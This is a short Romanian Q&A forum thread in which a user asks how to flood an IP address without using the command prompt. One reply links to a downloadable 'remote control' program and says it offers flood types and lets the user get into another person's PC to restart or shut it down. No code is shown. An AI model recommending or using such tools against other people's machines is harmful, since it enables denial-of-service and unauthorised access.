| Ady21 a întrebat:

Stie cineva cum floodez un ip? Dar fara CMD! Am tot cautat pe net dar gasesc numai varianta cu start-run-cmd... care mie nu imi merge. Imi Zice ceva cu request time...

2 răspunsuri:
| SanduVictor a răspuns:

Este cu virusi programul?

| Xenon_1305 a răspuns:

Pai iti trebuie un program... http://fisierulmeu.ro/22418EHLK5FW/Control-la-distanta-3-0-rar.html descarci de aici si il instalezi si intri in el ai mai multe optiuni acolo si dai la ce fel de flod vrei sa ii intri in pc sa ii dai restart sal inchizi sal deschizi etc sper ca te-am ajutat! fundita?